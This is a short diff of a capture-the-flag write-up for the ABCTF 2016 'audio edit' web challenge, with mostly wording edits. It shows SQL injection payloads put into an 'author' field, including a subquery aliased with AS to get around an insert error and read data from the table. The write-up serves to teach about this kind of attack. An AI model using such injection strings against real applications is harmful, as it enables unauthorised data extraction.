ctfs/write-ups-2016/abctf-2016/web/audio-edit-200/README.md

     author = a',(SELECT author FROM audioedit.audioedit LIMIT 0,1))-- -a

-... but it gaves us an insertion error!:(
+... but this gave us an insertion error!:(

 The problem is you can't select from a database that you're inserting into at the same time...
 Thanks to Arxenix!:)

-So we got around that using AS:
+So we got around by using AS:

     author = a',(SELECT author FROM audioedit.audioedit as blub LIMIT 0,1))-- -a:
     ABCTF